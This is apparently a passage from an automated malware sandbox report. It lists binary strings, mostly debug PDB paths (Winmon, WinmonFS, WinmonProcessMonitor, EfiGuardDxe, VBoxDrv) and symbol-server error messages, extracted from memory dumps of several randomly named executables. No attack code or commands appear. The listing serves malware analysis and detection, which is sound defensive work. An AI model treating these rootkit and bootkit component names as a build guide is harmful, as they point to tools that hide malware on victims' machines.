00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: Cvinfo is corruptThe .pdb file contains a corrupted debug codeview information. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Downloading symbols for [%s] %ssrv*symsrv*http://https://_bad_pdb_file.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The symbol server has never indexed any version of this symbol fileNo version of the .pdb file with the given name has ever been registered. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: PDB not foundUnable to locate the .pdb file in any of the symbol search path locations. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\vbox\branch\w64-1.6\out\win.amd64\release\obj\src\VBox\HostDrivers\VBoxDrv\VBoxDrv.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Drive not readyThis error indicates a .pdb file related failure. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: c:\Users\Admin\documents\visual studio 2015\Projects\Winmon\x64\Release\Winmon.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Error while loading symbolsUnable to locate the .pdb file in any of the symbol search source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: zzz_AsmCodeRange_*FrameDatainvalid string positionstring too long.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Pdb read access deniedYou may be attempting to access a .pdb file with read-only attributes source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: Unable to locate the .pdb file in this location source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\x64\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: The module signature does not match with .pdb signature. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: .pdb.dbg source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: '(EfiGuardDxe.pdbx source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: symsrv.pdbGCTL source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000C7A000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.0000000003619000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000C7A000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003689000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003639000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000C7A000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000003529000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000C7A000.00000040.00000001.01000000.00000011.sdmp
                  Source: Binary string: C:\Users\admin\source\repos\driver-process-monitor-master\Release\WinmonProcessMonitor.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: or you do not have access permission to the .pdb location. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\Admin\documents\visual studio 2015\Projects\WinmonFS\Release\WinmonFS.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000843000.00000040.00000001.01000000.00000012.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000843000.00000040.00000001.01000000.0000000E.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.0000000003253000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.0000000003203000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000843000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000843000.00000040.00000001.01000000.00000011.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.00000000030F3000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: An Exception happened while downloading the module .pdbPlease open a bug if this is a consistent repro. source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: EfiGuardDxe.pdb source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3182375526.0000000000ACD000.00000040.00000001.01000000.00000012.sdmp, VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3306333274.000000000346C000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3216774766.00000000034DC000.00000040.00001000.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3026570515.0000000000ACD000.00000040.00000001.01000000.0000000E.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3306276662.000000000348C000.00000040.00001000.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3183446408.0000000000ACD000.00000040.00000001.01000000.0000000F.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.000000000337C000.00000040.00001000.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3144948166.0000000000ACD000.00000040.00000001.01000000.00000011.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3250452098.000000000354C000.00000040.00001000.00020000.00000000.sdmp
